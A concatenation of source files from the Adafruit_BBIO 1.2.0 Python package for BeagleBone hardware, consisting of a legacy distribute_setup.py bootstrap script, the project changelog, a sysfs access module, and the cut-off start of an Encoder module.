def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, download_delay=15, no_fake=True):
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
was_imported = 'pkg_resources' in sys.modules or \
'setuptools' in sys.modules
try:
try:
import pkg_resources
# Setuptools 0.7b and later is a suitable (and preferable)
# substitute for any Distribute version.
try:
pkg_resources.require("setuptools>=0.7b")
return
except (pkg_resources.DistributionNotFound,
pkg_resources.VersionConflict):
pass
if not hasattr(pkg_resources, '_distribute'):
if not no_fake:
_fake_setuptools()
raise ImportError
except ImportError:
return _do_download(version, download_base, to_dir, download_delay)
try:
pkg_resources.require("distribute>=" + version)
return
except pkg_resources.VersionConflict:
e = sys.exc_info()[1]
if was_imported:
sys.stderr.write(
"The required version of distribute (>=%s) is not available,\n"
"and can't be installed while this script is running. Please\n"
"install a more recent version first, using\n"
"'easy_install -U distribute'."
"\n\n(Currently using %r)\n" % (version, e.args[0]))
sys.exit(2)
else:
del pkg_resources, sys.modules['pkg_resources'] # reload ok
return _do_download(version, download_base, to_dir,
download_delay)
except pkg_resources.DistributionNotFound:
return _do_download(version, download_base, to_dir,
download_delay)
finally:
if not no_fake:
_create_fake_setuptools_pkg_info(to_dir)
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, delay=15):
"""Download distribute from a specified location and return its filename
`version` should be a valid distribute version number that is available
as an egg for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download
attempt.
"""
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
tgz_name = "distribute-%s.tar.gz" % version
url = download_base + tgz_name
saveto = os.path.join(to_dir, tgz_name)
src = dst = None
if not os.path.exists(saveto): # Avoid repeated downloads
try:
log.warn("Downloading %s", url)
src = urlopen(url)
# Read/write all in one block, so we don't create a corrupt file
# if the download is interrupted.
data = src.read()
dst = open(saveto, "wb")
dst.write(data)
finally:
if src:
src.close()
if dst:
dst.close()
return os.path.realpath(saveto)
def _no_sandbox(function):
def __no_sandbox(*args, **kw):
try:
from setuptools.sandbox import DirectorySandbox
if not hasattr(DirectorySandbox, '_old'):
def violation(*args):
pass
DirectorySandbox._old = DirectorySandbox._violation
DirectorySandbox._violation = violation
patched = True
else:
patched = False
except ImportError:
patched = False
try:
return function(*args, **kw)
finally:
if patched:
DirectorySandbox._violation = DirectorySandbox._old
del DirectorySandbox._old
return __no_sandbox
def _patch_file(path, content):
"""Will backup the file then patch it"""
f = open(path)
existing_content = f.read()
f.close()
if existing_content == content:
# already patched
log.warn('Already patched.')
return False
log.warn('Patching...')
_rename_path(path)
f = open(path, 'w')
try:
f.write(content)
finally:
f.close()
return True
_patch_file = _no_sandbox(_patch_file)
def _same_content(path, content):
f = open(path)
existing_content = f.read()
f.close()
return existing_content == content
def _rename_path(path):
new_name = path + '.OLD.%s' % time.time()
log.warn('Renaming %s to %s', path, new_name)
os.rename(path, new_name)
return new_name
def _remove_flat_installation(placeholder):
if not os.path.isdir(placeholder):
log.warn('Unkown installation at %s', placeholder)
return False
found = False
for file in os.listdir(placeholder):
if fnmatch.fnmatch(file, 'setuptools*.egg-info'):
found = True
break
if not found:
log.warn('Could not locate setuptools*.egg-info')
return
log.warn('Moving elements out of the way...')
pkg_info = os.path.join(placeholder, file)
if os.path.isdir(pkg_info):
patched = _patch_egg_dir(pkg_info)
else:
patched = _patch_file(pkg_info, SETUPTOOLS_PKG_INFO)
if not patched:
log.warn('%s already patched.', pkg_info)
return False
# now let's move the files out of the way
for element in ('setuptools', 'pkg_resources.py', 'site.py'):
element = os.path.join(placeholder, element)
if os.path.exists(element):
_rename_path(element)
else:
log.warn('Could not find the %s element of the '
'Setuptools distribution', element)
return True
_remove_flat_installation = _no_sandbox(_remove_flat_installation)
def _after_install(dist):
log.warn('After install bootstrap.')
placeholder = dist.get_command_obj('install').install_purelib
_create_fake_setuptools_pkg_info(placeholder)
def _create_fake_setuptools_pkg_info(placeholder):
if not placeholder or not os.path.exists(placeholder):
log.warn('Could not find the install location')
return
pyver = '%s.%s' % (sys.version_info[0], sys.version_info[1])
setuptools_file = 'setuptools-%s-py%s.egg-info' % \
(SETUPTOOLS_FAKED_VERSION, pyver)
pkg_info = os.path.join(placeholder, setuptools_file)
if os.path.exists(pkg_info):
log.warn('%s already exists', pkg_info)
return
log.warn('Creating %s', pkg_info)
try:
f = open(pkg_info, 'w')
except EnvironmentError:
log.warn("Don't have permissions to write %s, skipping", pkg_info)
return
try:
f.write(SETUPTOOLS_PKG_INFO)
finally:
f.close()
pth_file = os.path.join(placeholder, 'setuptools.pth')
log.warn('Creating %s', pth_file)
f = open(pth_file, 'w')
try:
f.write(os.path.join(os.curdir, setuptools_file))
finally:
f.close()
_create_fake_setuptools_pkg_info = _no_sandbox(
_create_fake_setuptools_pkg_info
)
def _patch_egg_dir(path):
# let's check if it's already patched
pkg_info = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
if os.path.exists(pkg_info):
if _same_content(pkg_info, SETUPTOOLS_PKG_INFO):
log.warn('%s already patched.', pkg_info)
return False
_rename_path(path)
os.mkdir(path)
os.mkdir(os.path.join(path, 'EGG-INFO'))
pkg_info = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
f = open(pkg_info, 'w')
try:
f.write(SETUPTOOLS_PKG_INFO)
finally:
f.close()
return True
_patch_egg_dir = _no_sandbox(_patch_egg_dir)
def _before_install():
log.warn('Before install bootstrap.')
_fake_setuptools()
def _under_prefix(location):
if 'install' not in sys.argv:
return True
args = sys.argv[sys.argv.index('install') + 1:]
for index, arg in enumerate(args):
for option in ('--root', '--prefix'):
if arg.startswith('%s=' % option):
top_dir = arg.split('root=')[-1]
return location.startswith(top_dir)
elif arg == option:
if len(args) > index:
top_dir = args[index + 1]
return location.startswith(top_dir)
if arg == '--user' and USER_SITE is not None:
return location.startswith(USER_SITE)
return True
def _fake_setuptools():
log.warn('Scanning installed packages')
try:
import pkg_resources
except ImportError:
# we're cool
log.warn('Setuptools or Distribute does not seem to be installed.')
return
ws = pkg_resources.working_set
try:
setuptools_dist = ws.find(
pkg_resources.Requirement.parse('setuptools', replacement=False)
)
except TypeError:
# old distribute API
setuptools_dist = ws.find(
pkg_resources.Requirement.parse('setuptools')
)
if setuptools_dist is None:
log.warn('No setuptools distribution found')
return
# detecting if it was already faked
setuptools_location = setuptools_dist.location
log.warn('Setuptools installation detected at %s', setuptools_location)
# if --root or --preix was provided, and if
# setuptools is not located in them, we don't patch it
if not _under_prefix(setuptools_location):
log.warn('Not patching, --root or --prefix is installing Distribute'
' in another location')
return
# let's see if its an egg
if not setuptools_location.endswith('.egg'):
log.warn('Non-egg installation')
res = _remove_flat_installation(setuptools_location)
if not res:
return
else:
log.warn('Egg installation')
pkg_info = os.path.join(setuptools_location, 'EGG-INFO', 'PKG-INFO')
if (os.path.exists(pkg_info) and
_same_content(pkg_info, SETUPTOOLS_PKG_INFO)):
log.warn('Already patched.')
return
log.warn('Patching...')
# let's create a fake egg replacing setuptools one
res = _patch_egg_dir(setuptools_location)
if not res:
return
log.warn('Patching complete.')
_relaunch()
def _relaunch():
log.warn('Relaunching...')
# we have to relaunch the process
# pip marker to avoid a relaunch bug
_cmd1 = ['-c', 'install', '--single-version-externally-managed']
_cmd2 = ['-c', 'install', '--record']
if sys.argv[:3] == _cmd1 or sys.argv[:3] == _cmd2:
sys.argv[0] = 'setup.py'
args = [sys.executable] + sys.argv
sys.exit(subprocess.call(args))
def _extractall(self, path=".", members=None):
"""Extract all members from the archive to the current working
directory and set owner, modification time and permissions on
directories afterwards. `path' specifies a different directory
to extract to. `members' is optional and must be a subset of the
list returned by getmembers().
"""
import copy
import operator
from tarfile import ExtractError
directories = []
if members is None:
members = self
for tarinfo in members:
if tarinfo.isdir():
# Extract directories with a safe mode.
directories.append(tarinfo)
tarinfo = copy.copy(tarinfo)
tarinfo.mode = 448 # decimal for oct 0700
self.extract(tarinfo, path)
# Reverse sort directories.
if sys.version_info < (2, 4):
def sorter(dir1, dir2):
return cmp(dir1.name, dir2.name)
directories.sort(sorter)
directories.reverse()
else:
directories.sort(key=operator.attrgetter('name'), reverse=True)
# Set correct owner, mtime and filemode on directories.
for tarinfo in directories:
dirpath = os.path.join(path, tarinfo.name)
try:
self.chown(tarinfo, dirpath)
self.utime(tarinfo, dirpath)
self.chmod(tarinfo, dirpath)
except ExtractError:
e = sys.exc_info()[1]
if self.errorlevel > 1:
raise
else:
self._dbg(1, "tarfile: %s" % e)
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the distribute package
"""
install_args = []
if options.user_install:
if sys.version_info < (2, 6):
log.warn("--user requires Python 2.6 or later")
raise SystemExit(1)
install_args.append('--user')
return install_args
def _parse_args():
"""
Parse the command line for options
"""
parser = optparse.OptionParser()
parser.add_option(
'--user', dest='user_install', action='store_true', default=False,
help='install in user site package (requires Python 2.6 or later)')
parser.add_option(
'--download-base', dest='download_base', metavar="URL",
default=DEFAULT_URL,
help='alternative URL from where to download the distribute package')
options, args = parser.parse_args()
# positional arguments are ignored
return options
def main(version=DEFAULT_VERSION):
"""Install or upgrade setuptools and EasyInstall"""
options = _parse_args()
tarball = download_setuptools(download_base=options.download_base)
return _install(tarball, _build_install_args(options))
if __name__ == '__main__':
sys.exit(main()) | Adafruit-BBIO | /Adafruit_BBIO-1.2.0.tar.gz/Adafruit_BBIO-1.2.0/distribute_setup.py | distribute_setup.py |
1.1.2
---
Daniel Nguyen (2):
Update common.c
Update common.c
Drew Fustini (28):
upload to PyPI againt to resolve #293
do not set pinmux on the beaglebone blue
remove deug output
Fix dead link to bone.js #296
force Encoder period to be an integer #299
Ignore new compiler warnings in gcc 8.2.0
Update setup.py
do not set pin mode for built-in USRn LEDs
Change name of P1_3 to match bone.js
Fix warning about casting incompatible function types #308
Fix warning print format strings being truncated #308
Fix warning about casting incompatible function types #308
Fix warnings on format truncation and sizeof in strncpy #308
Fix warning about casting incompatible function types #308
Update travis config to specify Python 3.6
Update tox.ini to Python 3.6
Merge pull request #321 from adafruit/issue308
Update ISSUE_TEMPLATE.md
Update README.md
Update README.md
Merge pull request #327 from zer0cod3r/master
Merge pull request #337 from SamPovilus/docfix
Update README.md
Update README.md
Update README.md
remove -Werror from CFLAGS
Remove suppression of gcc warnings in CFLAGS #336
Update version in setup.py to v1.2
Sam Povilus (1):
fixing document locaiton and version as current location dosn't load
1.1.1
---
Attempt upload to PyPI again to avoid
error reported in issue #293
1.1.0
---
Aaron Marburg (1):
* Added usleep after successfully enabling PWM via udev.
Drew Fustini (16):
* Merge pull request #233 from zsserg/fixed_segfault_in_event_detection
* Merge pull request #257 from zsserg/develop
* Merge pull request #251 from amarburg/master
* Merge pull request #271 from fcooper/documentation-updates
* Update ADC.rst
* Update Encoder.rst
* Update ADC.rst
* Add UART entries for the PocketBeagle (issue #242)
* update install and test shell scripts
* update UART section in README
* Merge pull request #282 from erikwelsh/master
* do not load overlays for the beaglebone blue #283
* Merge pull request #284 from sam-bristow/py3-docs
* Merge pull request #285 from sam-bristow/bugfix/uart-error-reporting
* fix pwm on pocketbeagle and beaglebone blue #286
* remove debug logging
Erik Welsh (1):
* Fixed GPIO export problem; Leaves GPIO in bad state on latest BeagleBone image on PocketBeagle
Franklin S Cooper Jr (3):
* docs/SPI.rst: Fix bus numbering in examples
* docs/GPIO.rst: Add information on blinking led
* docs/GPIO.rst Make documentation a bit newbie friendly
Sam Bristow (3):
* Use print() function in all code and docs
* Use new python-serial API
* Return error-code for failing interface
zserg (5):
* Fixed SEGFAULT when calling remove_event_detect() inside python callback function.
* Fixed SEGFAULT when calling remove_event_detect() inside python callback function.
* Fixed SEGFAULT in event_gpio,c run_callbacks() * Added more elaborate epoll() error logging
* Minor style fixes
1.0.10
----
**features**
* automatically set pin modes for UART (PR #158)
* Encoder: README.md: added note about eqep group change (PR #214)
* deprecate out of date Adafruit_I2C.py (PR #215)
* Add Encoder module info to main README.md (PR #217)
* Add automatic API documentation generation (PR #219)
* Separate API docs into modules (PR #221)
**shortlog**
* David Planella (46):
* Encoder: README.md: added note about eqep group change
* Add Encoder module info to main README.md
* Added docstrings using Google syntax and Sphinx support to generate the API documentation for the Encoder and PWM modules for now.
* Made kernel version check to happen only if running on a beaglebone. The readthedocs builders that import the Encoder module have an old 3.3 kernel and the autodoc build fails
* Use the default readthedocs theme
* Use readthedocs theme if building docs there, remove redundand search link
* Readthedocs theme tweaks
* Removed redundant TOC, added global description
* Added UART documentation
* Added documentation badge
* Added ADC API docs, fixed UART module definition
* API docs: added SPI module
* Added SPI module attribute docs
* Added Python badges to README file
* Added SPI pins table and first shot at GPIO module. Functions still need to be documented
* Merge branch 'readthedocs' of https://github.com/dplanella/adafruit-beaglebone-io-python into readthedocs
* Documented the API docs build process
* Added docstrings using Google syntax and Sphinx support to generate the API documentation for the Encoder and PWM modules for now.
* Made kernel version check to happen only if running on a beaglebone. The readthedocs builders that import the Encoder module have an old 3.3 kernel and the autodoc build fails
* Use the default readthedocs theme
* Use readthedocs theme if building docs there, remove redundand search link
* Readthedocs theme tweaks
* Removed redundant TOC, added global description
* Added UART documentation
* Added documentation badge
* Added ADC API docs, fixed UART module definition
* API docs: added SPI module
* Added SPI module attribute docs
* Added Python badges to README file
* Added SPI pins table and first shot at GPIO module. Functions still need to be documented
* Documented the API docs build process
* Merge branch 'readthedocs' of https://github.com/dplanella/adafruit-beaglebone-io-python into readthedocs
* Update README.md
* Added some more API doc content
* Sync from upstream master
* Minor documentation and configuration improvements
* Finished documenting GPIO
* rST fixes
* Update README.md
* Minor API doc improvements
* Merge branch 'readthedocs' of https://github.com/dplanella/adafruit-beaglebone-io-python into readthedocs
* Generate the API documentation from a master index and a separate file for each module
* Sync from upstream master
* Improvements to the API docs output config
* Update docs generation description to reflect new separate modules
* Updated ADC API docs
* Drew Fustini (10):
* use set_pin_mode() to set uart pinmux (#158)
* Add SPI instructions to README (#158)
* Update README.md
* Fix spidev path mismatch (#216)
* Merge pull request #217 from dplanella/patch-2
* Merge pull request #214 from dplanella/patch-1
* Deprecate Adafruit_BBIO.I2C in favor of Adafruit_GPIO.I2C (#215)
* Merge pull request #219 from dplanella/readthedocs
* relocate doc dir to avoid confusion (#218)
* Merge pull request #221 from dplanella/readthedocs
1.0.9
----
**Features:**
* Issue #194: Encoder position cannot be set
* PR #205: Encoder: add support for reading/writing sysfs attributes
**Fixes:**
* Issue #198: use https for DEFAULT_URL in distribute_setup.py
* Issue #197: Fix leak of pwm enable file descriptor
* Issue #189: Fix seg fault of PWM in Python 3.6
* Issue #180: Clarify there is no 0 prefix for pin lables
* PR #201: Encoder: do kernel check, PEP8 cleanup
* PR #202: Encoder: corrected kernel check logic
* PR #207: Encoder: improved usage documentation
* PR #210: Encoder: fix sysfs import, make code Python 3 compatible
* PR #212: Encoder: fix Python 3 compatibility
* PR #213: Encoder: fix frequency calculation from period
**shortlog:**
* David Planella (18):
* Encoder: initialize only the given channel
* Sync from master
* Encoder: do kernel check, PEP8 cleanup
* Encoder: added sysfs module
* Encoder: use sysfs to write QEP attributes
* Encoder: corrected kernel check logic
* Merge pull request #2 from adafruit/master
* Encoder: convert get/set methods to properties, update apidoc strings
* Encoder: updated README
* Encoder: add README apt install clarification
* Encoder: copyright assignment note, updated comments
* Encoder: added usage notes
* Encoder: improved usage documentation
* Encoder: minor fix to usage example
* Encoder: added a note about permissions
* Encoder: switched sysfs to be a relative import compatible with Python 2 and 3
* Encoder: use items() instead of iteritems() to be Python 3 compatible
* Encoder: fix frequency getter
* Drew Fustini (18):
* use https for DEFAULT_URL in distribute_setup.py (#198)
* fix except syntax for Python 3
* use dict.items() instead of dict.iteritems() for Python 3
* fix error in set_brightness()
* close enable_fd when stopping PWM output (#197)
* Merge pull request #199 from dplanella/patch-1
* Fix leak of pwm enable file descriptor (#197)
* Merge pull request #201 from dplanella/encoder-cleanup
* remove test_rotary.py as not valid for pytest
* Fix seg fault of PWM in Python 3.6 (#189)
* Merge pull request #202 from dplanella/patch-2
* Clarify there is no 0 prefix for pin lables (#180)
* Merge pull request #205 from dplanella/encoder-sysfs
* assign copyright for new file to Adafruit Industries
* Add bash scripts to help install and test
* Merge pull request #212 from dplanella/patch-4
* Merge pull request #207 from dplanella/patch-3
* Merge pull request #213 from dplanella/fix-encoder-frequency
1.0.8
----
**Fixes:**
* Issue #196: cache board type to avoid poor performance
* Issue #192: fix PocketBeagle PWM pin typo
* Issue #191: turn off RotaryEncoder's debug output by default
* Issue #188: GPIO is extremely slow (20ms to toggle)
* Issue #186: problems with UART
**shortlog:**
* David Planella (12):
* Copy Encoder module comments to README.md
* Formatted Encoder README in markdown
* Fixed Encoder README formatting
* Removed QEP instructions from Encoder module
* Fixes to Encoder README
* Updated Encoder README
* Encoder README: added info on dedicated overlays
* Encoder README: updated info on pre-requisites
* Encoder README update
* Encoder README update
* Add logging support, turn off unconditional debug output
* Encoder: remove unused logging code
* Drew Fustini (3):
* Merge pull request #195 from dplanella/master
* Fix PocketBeagle PWM pin typo (#192)
* cache board type to avoid poor performance (#196)
1.0.7
----
**Fixes:**
* Issue #188: GPIO is extremely slow (20ms to toggle)
**shortlog:**
* Drew Fustini (4):
* Update README.md
* add config-pin example to README
* Filter DEBUG syslog to avoid poor performance #188
* Change log level from INFO to DEBUG #188
1.0.6
----
* Currently recommended image: [Debian 9.2 "Stretch" iot (2017-10-29)](https://elinux.org/Beagleboard:BeagleBoneBlack_Debian#microSD.2FStandalone:_.28stretch-iot.29_.28All_BeagleBone_Variants_.26_PocketBeagle.29)
* Install [Linux kernel](https://elinux.org/Beagleboard:BeagleBoneBlack_Debian#Kernel_Options) [4.14.x](https://elinux.org/Beagleboard:BeagleBoneBlack_Debian#Mainline_.284.14.x_lts.29) to enable [non-root control of GPIO](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/80-gpio-noroot.rules) and [PWM](https://github.com/rcn-ee/repos/blob/master/bb-customizations/suite/stretch/debian/81-pwm-noroot.rules) [_(commit)_](https://github.com/adafruit/adafruit-beaglebone-io-python/commit/b65cbf8e41b444bad7c4ef6cfd4f88a30210fd78)
**Features:**
* Add support for Linux 4.14 kernel including new "udev" style for PWM entries in /sys
* Fix GPIO regression due to BeagleBone Blue LED support (issue #178)
* Add support for the PocketBeagle (issue #172)
**shortlog:**
* Drew Fustini (39):
* Add -Wno-unit_address_vs_reg to avoid dtc warning
* check if board is BeagleBone Blue or PocketBeagle
* check if BeagleBone Blue before accessing non-standard LEDs
* Add test for GPIO regression #178
* change syslog mask level to DEBUG
* add "Adafruit_BBIO" to syslog()
* update test for issue #178
* remove polarity "hack" for PWM #170
* move pwm_set_polarity() after period is set
* add test for issue #170
* only check kernel overlays if u-boot overlays are not being used
* Attempt to use udev ecap path for pwm path
* add test script for all BeagleBone PWM outputs
* update PWM test for 4.14 kernel udev paths
* minor change to pwm debug logging
* sleep to avoid udev race condition #185
* Mark A. Yoder (1):
* Added BAT25, BAT50, BAT75, BAT100 and WIFI LEDs
* Peter Lawler (1):
* Missing CR/LF
* Robert Nelson (10):
* source/common.c: add initial PocketBeagle values
* source/common.c: PocketBeagle, no slots file, everything built-in
* source/common.c: PocketBeagle, no slots file disable here too
* source/c_pwm.c: HACK: U-Boot pre-setup everything, dont search for specific overlay
* source/c_pwm.c: HACK: PocketBeagle: v4.14.x
* source/c_pwm.c: debug pwm_path/pwm_path_udev
* source/c_pwm.c: pwm: add support for pwmchipX/pwm-X:Y syntax
* source/c_pwm.c: disable pwm_set_polarity (broken in v4.9.x/v4.14.x)
* source/common.c: Blue Fix GP0_3 id
* source/common.c: PocketBeagle Fix P2.24
1.0.5
----
* @pdp7 (5):
* Merge pull request #153 from MarkAYoder/master
* Fix print syntax to avoid python3 errors
* Merge pull request #160 from MarkAYoder/master
* document how to read QEP1
* Update rotary-encoder-eqep-test.md
* @MarkAYoder (20):
* Have GP0_1 working
* Removed --force to speed things up
* Added GP0 1, 2 and 3
* Flashes 4 LEDs
* Works with button
* Blinks red and gree LEDs
* Blinks all 6 GPIOs
* Added red and green LEDs
* i2c works
* PWD isn't working, yet
* Added port setup
* Switched to apt install
* Added tmp101 to name
* Added LED matrix example
* Removed newline from print
* Added fade
* Adding GPIO defs for uart1
* Testing UT1_0, not working yet
* Switched GP0_0 to GP0_3, etc.
* Added PAUSE and MODE buttons.
1.0.4
----
* @djsutton (1):
* fix TypeError: function takes exactly 3 arguments (2 given) from wait_for_edge
* @pdp7 (29):
* Instruct users to open GitHub issue instead email
* add udev rules and script for non-root access to gpio
* fix file descriptor leak in gpio_set_value()
* document how to test read and write to all GPIO pins
* reduce ADC reads in pytest from 10,000 to 1,000
* close file descriptor to avoid leak
* remove conditional logic for ctrl_dir and ocp_dir size
* increase size of ctrl_dir and ocp_dir for future use
* Document how to run config-pin at boot
* Document how to test eQEP with Rotary Encoder
* Add skeleton for Encoder module to read eQEP
* Add code to Encoder.QEP from PyBBIO.RotaryEncoder
* Adapt code from PyBBIO.RotaryEncoder
* add test for rotary encoder
* read from eqep position file
* return position from getPosition()
* document howo to enable all the eqep pins
* Document how to test eqep pins with rotary encoder
* run config-pin to set pin mux for qep
* update QEP test
* update QEP test for issue #122
* Test if kernel booted wit u-boot overlays
* check if kernel cmdline for uboot overlay
* Add documentation about u-boot overlays
* Return BBIO_OK when u-boot overlays ared enabled
* remove debug printing
* Skip check for device tree loaded if u-boot overlays enabled
* Sleep after loading ADC overlay to allow driver load
* Workaround test failure until TIMERn bug is fixed
* @ltjax (3):
* Use lookup table to prevent duplicate pin export
* Handle already exported pins
* Fix build_path memory leak
* @Vadim-Stupakov (1):
* Fixed issue #145 GPIO library doesn't free GPIO file descriptor. File descriptor leak. Made a little bit refactoring
* @cocasema (8):
* Declare PHONY targets in root Makefile
* Extract BBIO_err into a separate header
* Add syslog and debugging messages
* Add libadafruit-bbio with C++ wrappers for PWM/GPIO
* Add 2 versions of library with c++98 and c++11 abi
* Install header files properly
* Add default values to pwm::start() method.
* Add PWM c++ tests
* @zsserg (2):
* Added error checking for setting pin direction in gpio.setup() (Python)
* Added debug output to set_pin_mode()
1.0.3
----
* Add -Wno-strict-aliasing to CFLAGS to ignore gcc warning
* Resolves GitHub issue #133 by @archey
1.0.2
----
* Merge pull request #130 from adafruit/issue129-usr-leds [1439133]
* Add support for alternate USR LED labels
* Merge pull request #131 from adafruit/fix-gcc-warnings [f0ee018]
* Fix gcc warnings
* Merge pull request #132 from buckket/setup_unicode_fix [4c67dfc]
* Make use of io.open() with explicit file encoding in setup.py
1.0.1
----
* Merge pull request #124 from jpbarraca/master [cf9771a]
* Timeout support for wait_for_edge (replaces PR #62)
* Merge pull request #123 from bubbapizza/master [8b4f7f2]
* Added a delay parameter for GPIO.setup() for udev permissions
* Merge pull request #121 from dengber/master [50e8883]
* ADC.read() returns wrong value
* Merge pull request #64 from olegantonyan/master [d1e8dc1]
* Wait until GPIO file appears on the /sys filesystem (issue #36)
* Merge pull request #106 from cocasema/master [12b79d7]
* Treat warnings as errors
* Merge pull request #119 from JesseMcL/pr [e7e987a]
* Add GPIO pullup configurations and fix PWM Segfault on kernel 4.1+
* Merge pull request #116 from kozga/master [1b04cdf]
* Fix SPI: IOError: [Errno 22] Invalid argument in xfer and xfer2 funct…
1.0.0
----
* Merge pull request #108 from MatthewWest for PWM support in Linux kernel 4.1+
* Merge pull request #96 from PeteLawler for ADC support in Linux kernel 4.1+
* Finally publish new version to PyPi
* Bump major version number to signify long duration since last release
0.0.30
-----
* Merge Python 3 compatibility fixes from Github user westphahl.
* Moved old Angstrom build fix for missing py_compile from setup.py to separate file.
0.0.20
----
* Fix for SPI not loading spidevX.X correctly based on load order
* Initialize ctrl_dir in unload_device_tree #63
* Clean up unused/dead code
0.0.19
----
* Fix for SPI.xfer crashes python after 3 calls
* Added a retry to reading for the analog inputs to avoid a bug where reading back and forth between two analog inputs would cause the resource to be unavailable every 16 scans (zthorson)
* Updated the build_path to be more selective over what paths it chooses (zthorson)
* Update Debian installation instructions in README (justinledwards)
* Increase the size of the buffer used for storing device tree names (SaintGimp)
0.0.18
----
* UART - Include UART overlays, and compile upon installation
* UART - Rename UART overlays
* Adafruit_I2C - Remove readU16Rev and readS16Rev
* Adafruit_I2C - Updated readU16/readS16 for correct 16-bit reads
0.0.17
----
* Fix SPI memory leaks
* Clean up of PWM code (bit-hacker, jwcooper)
* Remove UART debug statements
0.0.16
----
* Add polarity as optional fourth parameter to PWM.start(). Valid values are 0 and 1. Default is still 0.
* Fix for actually setting the polarity in start.
* Add new unit tests to check that the polarity is being set properly, and valid values passed in.
0.0.15
----
* Fix PWM duty cycle so 0 is off and 100 is on. Set polarity to 0 by default.
* Give extra buffer space in export, and unexport functions for gpio that are more than 2 digits (Chris Desjardins)
* Add new test case for 3 digit gpio (Chris Desjardins)
* Fix for test_direction_readback. gpio_get_direction wasn't properly null terminating the direction string (Chris Desjardins)
0.0.14
----
* Fix GPIO.gpio_function to work with the IO name (zthorson)
* Fix IOErrors not getting raised when fopen fails while loading overlays into device tree (bradfordboyle, jwcooper)
* Add new UART tests
0.0.13
----
* Remove the gpio parameter from callbacks (cdesjardins)
0.0.12
----
* Bump version due to pypi issues
0.0.11
----
* New UART module to export UART overlays
* Alpha support for SPI
* Add small delay after loading any device tree overlays
0.0.10
____
* Fix direction for event detection code
* Fix for segmentation faults on add_event_detect
0.0.9
____
* Fix for ADC Segmentation Faults
0.0.8
____
* Temp remove overlay compilation. Ubuntu failures.
0.0.7
____
* Refactor and clean up adc and pwm
* Fix tests for Adafruit_BBIO rename
0.0.6
____
* Include Adafruit_I2C.py as top-level module
0.0.5
----
* Rename from BBIO to Adafruit_BBIO to reduce library conflicts and confusion.
0.0.4
----
* Support for pip and easy_install
0.0.3
____
* ADC enabled
0.0.2
____
* PWM enabled
0.0.1
____
* Initial Commit
* GPIO mostly working
* Initial GPIO unit tests
* PWM in progress
| Adafruit-BBIO | /Adafruit_BBIO-1.2.0.tar.gz/Adafruit_BBIO-1.2.0/CHANGELOG.md | CHANGELOG.md |
# Copyright (c) 2014 MIT OpenCourseWare
# Copyright (c) 2017 Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Code originally published at http://stackoverflow.com/questions/4648792/ and
# subsequently forked at https://github.com/ponycloud/python-sysfs
#
# Original author: Benedikt Reinartz <[email protected]>
# Contributors:
# - Jan Dvořák <[email protected]>
# - Jonathon Reinhart https://github.com/JonathonReinhart
# - Ondřej Koch <[email protected]>
# - David Planella <[email protected]>
"""
Simplistic Python SysFS interface. It enables access to the sys filesystem device
nodes and to get and set their exposed attributes.
Usage examples::
from sysfs import sys
# Print all block devices in /sys, with their sizes
for block_dev in sys.block:
print(block_dev, str(int(block_dev.size) / 1048576) + ' M')
>>> import sysfs
>>> # Read/write Beaglebone Black's eQEP module attributes
>>> eqep0 = sysfs.Node("/sys/devices/platform/ocp/48300000.epwmss/48300180.eqep")
>>> # Read eqep attributes
>>> eqep0.enabled
'1'
>>> eqep0.mode
'0'
>>> eqep0.period
'1000000000'
>>> eqep0.position
'0'
>>> # Write eqep attributes. They should be strings.
>>> eqep0.position = str(2)
>>> eqep0.position
'2'
"""
from os import listdir
from os.path import isdir, isfile, join, realpath, basename
__all__ = ['sys', 'Node']
class Node(object):
__slots__ = ['_path_', '__dict__']
def __init__(self, path='/sys'):
self._path_ = realpath(path)
if not self._path_.startswith('/sys/') and not '/sys' == self._path_:
raise RuntimeError('Using this on non-sysfs files is dangerous!')
self.__dict__.update(dict.fromkeys(listdir(self._path_)))
def __repr__(self):
return '<sysfs.Node "%s">' % self._path_
def __str__(self):
return basename(self._path_)
def __setattr__(self, name, val):
if name.startswith('_'):
return object.__setattr__(self, name, val)
path = realpath(join(self._path_, name))
if isfile(path):
with open(path, 'w') as fp:
fp.write(val)
else:
raise RuntimeError('Cannot write to non-files.')
def __getattribute__(self, name):
if name.startswith('_'):
return object.__getattribute__(self, name)
path = realpath(join(self._path_, name))
if isfile(path):
with open(path, 'r') as fp:
return fp.read().strip()
elif isdir(path):
return Node(path)
def __setitem__(self, name, val):
return setattr(self, name, val)
def __getitem__(self, name):
return getattr(self, name)
def __iter__(self):
return iter(getattr(self, name) for name in listdir(self._path_))
sys = Node() | Adafruit-BBIO | /Adafruit_BBIO-1.2.0.tar.gz/Adafruit_BBIO-1.2.0/Adafruit_BBIO/sysfs.py | sysfs.py |
from subprocess import check_output, STDOUT, CalledProcessError
import os
import logging
import itertools
from .sysfs import Node
import platform
(major, minor, patch) = platform.release().split("-")[0].split(".")
if not (int(major) >= 4 and int(minor) >= 4) \
